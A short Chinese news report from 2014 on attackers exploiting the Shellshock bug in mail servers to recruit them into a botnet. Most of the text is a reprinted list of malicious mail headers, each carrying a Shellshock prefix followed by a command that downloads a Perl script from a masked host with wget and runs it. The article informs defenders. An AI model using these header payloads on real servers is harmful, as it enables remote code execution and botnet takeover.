来了!攻击者利用Shellshock漏洞入侵邮件服务器
攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。
安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl脚本,成为僵尸网络的一部分。邮件消息头的构成是:
- Shellshock spam October 2014 (IP地址已隐藏)
- ===
- To:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- References:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Cc:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Subject:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Message-ID:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Comments:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Keywords:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Resent-Date:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Resent-From:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
- Resent-Sender:() { :; };wget -O /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend
原文发布时间:2014-10-29
本文来自云栖合作伙伴“linux中国”